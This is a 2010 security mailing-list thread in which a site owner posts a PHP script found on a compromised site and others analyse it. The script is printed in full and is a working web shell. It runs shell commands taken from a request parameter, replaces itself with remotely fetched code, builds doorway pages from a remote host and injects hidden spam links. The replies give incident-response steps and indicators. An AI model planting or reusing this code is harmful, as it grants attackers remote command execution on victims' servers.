Search the web for the marker tag <adsttnmq1> that appears in the quoted script. It is the delimiter the script wraps its injected content in (MRepl() appends a `<adsttnmq1>...<sdioyslkjs2>` block and Clear2() strips it again), so it is a usable indicator for finding other pages that were modified the same way. Reports mentioning this marker go back to around 3/24/09, so this appears to be an older, already-documented attack rather than something new.
On Mon, Mar 1, 2010 at 10:29 AM, Andrew Ellis <[email protected]> wrote: > This is fairly obfuscated (short meaningless names and a single parameter-driven dispatcher), but the structure and > several of the things it does are reminiscent of a PHP web shell such as c99. > > Code like: > function Com() > { > if (isset($_POST['c'])) > @system($_POST['c']); > if (isset($_GET['c'])) > @system($_GET['c']); > } > passes whatever is in the `c` request parameter straight to system(), so anyone who can reach this page runs shell commands as the web-server user; there is no authentication or shared secret of any kind, and the `@` suppresses any error output. Main() dispatches purely on which parameter is present (POST or GET): `c` runs a command; `u` opens the path or URL given in `u` with fopen() and overwrites 1.php with its contents (a self-update mechanism); `s` appends the content of the `drs` parameter to the page whose path is stored in the file `m`, wrapped in `<adsttnmq1>...<sdioyslkjs2>` inside a zero-size hidden <font> element (hidden link/SEO spam injection); `uk` re-wraps those marker strings in angle brackets; `g` creates randomly named directories, drops a .htaccess fetched from `$sg."2.txt"` into them and fills them with pages fetched from `$sg."sgen.php?g=..."` (doorway-page generation); `cl` and `cl2` remove the script's working files and the injected markup. If `u` and `sg` are URLs, as the `?g=` query string strongly suggests, the fetches depend on allow_url_fopen being enabled. The mis-encoded comment in MRepl() is Windows-1251 Cyrillic and reads "удаляем завершающие хтмл теги" ("remove the trailing html tags"). > > I copied all the code you posted to a box and ran it through php at > the command line. If you add something like $_POST['c'] = "ls > test.txt" to the top of the file and run it, you'll find no output on > the page but a newly created test.txt holding the listing of the > directory containing this script, because the shell redirect sends system()'s output to the file. (Do this only in an isolated VM with no network access: Update() and Gen() fetch content from attacker-controlled locations and Com() executes whatever it is given.) > > Sad to say, it looks like the host was compromised. Treat it that way: keep a copy of the script together with its timestamps before touching anything, look for the companion files it uses (c, 1r, log, m, 1.php, and random five-letter directories containing a .htaccess and three-letter subdirectories of *_N.htm pages), grep the site's pages for the <adsttnmq1> marker or the hidden zero-size <font> style, and check the web logs for requests to this script carrying c=, u=, s= or g= parameters to see what was actually run. The script itself does not show how it got onto the server; that still has to be established before cleaning up, or it will simply come back. > > > > On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <[email protected]> > wrote: > > Ok, I think one of my sites may have been compromised. I found the > following > > PHP script on a site, but I'm not sure what it is trying to do. Has anyone > else > > seen this script before? 
> > > > Adrian > > > > <?php > > ignore_user_abort(1); > > set_time_limit(0); > > > > function Clear() > > { > > unlink("c"); > > unlink("1r"); > > unlink("log"); > > } > > > > function Clear2() > > { > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > > $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > > $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); > > $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); > > $fin = ereg_replace("<!--dd4-->", "", $fin); > > $fin = ereg_replace("<!--dd5-->", "", $fin); > > $fin = ereg_replace("<font style=\"position: absolute;overflow: > > hidden;height: 0;width: 0\">", "", $fin); > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > echo " upt-ok"; > > } > > > > function GetVar($name, &$var) > > { > > $var = ""; > > if (isset($_POST[$name])) > > $var = $_POST[$name]; > > > > if (isset($_GET[$name])) > > $var = $_GET[$name]; > > > > if (($var) =="") > > return false; > > else return true; > > } > > > > function Gen() > > { > > $alp = "abcdefghiklmnjsweqrtyuiopzx"; > > $maps = array(); > > if (isset($_POST["sg"])) > > $sg = $_POST["sg"]; > > > > if (isset($_GET["sg"])) > > $sg = $_GET["sg"]; > > > > if (isset($_POST["gm"])) > > $g = $_POST["gm"]; > > > > if (isset($_GET["gm"])) > > $g = $_GET["gm"]; > > > > > > $path = ""; > > $fr = fopen("1r", "a+"); > > if (file_exists("c")) > > { > > $fconf = file("c"); > > $tname = trim($fconf[0]); > > $cname = trim($fconf[1]); > > $curs = trim($fconf[2]); > > $pid = trim($fconf[3]); > > if ($pid == 100) > > { > > $pid = 0; > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<3; $i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $cname = $nm; > > mkdir("$tname/$cname"); > > $curs = $g; > > } > > } > > else > > { > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<5; 
$i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $tname = $nm; > > $pid = 0; > > $curs = $g; > > mkdir($tname); > > $fht = fopen("$tname/.htaccess", "w+"); > > $htname = $sg."2.txt"; > > $fp = fopen($htname, "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > fwrite($fht, $fin); > > fclose($fht); > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<3; $i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $cname = $nm; > > mkdir("$tname/$cname"); > > } > > $gname = $sg."sgen.php"; > > for ($j=$pid; $j<$pid+10; $j++) > > { > > $fp = fopen($gname."?g=$curs", "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > > > $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); > > fwrite($fnd, $fin); > > fclose($fnd); > > } > > > > if ($j==100) > > { > > $fp = fopen($gname."?g=$curs&m=1", "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); > > fwrite($fnd, $fin); > > fclose($fnd); > > $map = "$path/$tname/$cname/$curs"."_lm.htm"; > > fwrite($fr,"$map\n"); > > } > > > > $fconf = fopen("c", "w+"); > > fwrite($fconf, $tname."\n"); > > fwrite($fconf, $cname."\n"); > > fwrite($fconf, $curs."\n"); > > $nj = $j; > > fwrite($fconf, $nj."\n"); > > fclose($fconf); > > } > > > > function Update() > > { > > $thisname = "1.php"; > > if (isset($_POST['u'])) > > $u = $_POST['u']; > > > > if (isset($_GET['u'])) > > $u = $_GET['u']; > > > > $fp = fopen($u, "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > > > $fthis = fopen($thisname, "w+"); > > fwrite($fthis, $fin); > > fclose($fthis); > > } > > > > 
function Com() > > { > > if (isset($_POST['c'])) > > @system($_POST['c']); > > if (isset($_GET['c'])) > > @system($_GET['c']); > > } > > > > function UpKos() > > { > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); > > $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > } > > > > > > function MRepl() > > { > > $mpt = ""; > > $drs = ""; > > $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: > > hidden;height: 0;width: 0\">"; > > $endtag = "</font></body></html><sdioyslkjs2> "; > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > GetVar("mpt", $mpt); > > // óäàëÿåì çàâåðøàþùèå õòìë òåãè > > $fin = preg_replace ("/<\/body>/i", "", $fin); > > $fin = preg_replace ("/<\/html>/i", "", $fin); > > $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > > $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > > $fp = fopen($mpt, "r"); > > GetVar("drs", $drs); > > $fin = $fin.$begtag; > > $drs = str_replace("\\", "", $drs); > > $fin = $fin.$drs; > > $fin = $fin.$endtag; > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > } > > > > function Main() > > { > > if (isset($_POST['u']) || isset($_GET['u'])) > > { > > Update(); > > exit(); > > } > > > > if (isset($_POST['c']) || isset($_GET['c'])) > > { > > Com(); > > exit(); > > } > > > > if (isset($_POST['uk']) || isset($_GET['uk'])) > > { > > UpKos(); > > exit(); > > } > > > > if (isset($_POST['g']) || isset($_GET['g'])) > > { > > Gen(); > > exit(); > > } > > > > if (isset($_POST['s']) || isset($_GET['s'])) > > { > > MRepl(); > > exit(); > > } > > > > if (isset($_POST['cl']) || isset($_GET['cl'])) > > { > > Clear(); > > exit(); > > } > > > > if (isset($_POST['cl2']) || isset($_GET['cl2'])) > > { > > Clear2(); > > exit(); > > } > > > > echo 
"<ok>"; > > > > } > > > > Main(); > > > > ?> > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > > > > -- > Andrew Ellis > http://blog.psych0tik.net > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
